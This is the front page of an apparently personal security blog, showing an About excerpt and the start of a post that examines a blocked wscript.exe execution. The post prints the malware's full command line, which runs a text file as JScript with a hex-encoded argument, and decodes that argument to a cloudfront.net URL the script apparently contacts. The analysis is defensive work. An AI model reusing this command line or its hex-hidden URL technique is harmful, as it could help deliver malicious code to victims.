Welcome to niem.es

Some musings on (mostly) security related topics.

Latest from the Blog

About:me

I’m a dedicated father and friend. I enjoy technology immensely and feel extremely lucky to have been born at the right place & during the right time. I started out working for the University of Dayton as a co-op student in computer science. I fell in love with the concept of networking – this was

Continue reading “About:me”

Examining strange wscript behavior

We use Cylance with script control, and periodically I review the outliers that have been blocked. I came across this one recently:

wscript.exe “C:\ProgramData\{18E0DD83-92A2-5745-1464-C9078E2642C9}\domo.txt” “68747470733a2f2f643237346571343163333972326e2e636c6f756466726f6e742e6e6574” “//B” “//E:jscript” “–IsErIk”

I took a copy of the domo.txt script and uploaded it to VT:

I also ran that hex string through a hex decoder: 68747470733a2f2f643237346571343163333972326e2e636c6f756466726f6e742e6e = https://d274eq41c39r2n.cloudfront.net

According to

Continue reading “Examining strange wscript behavior”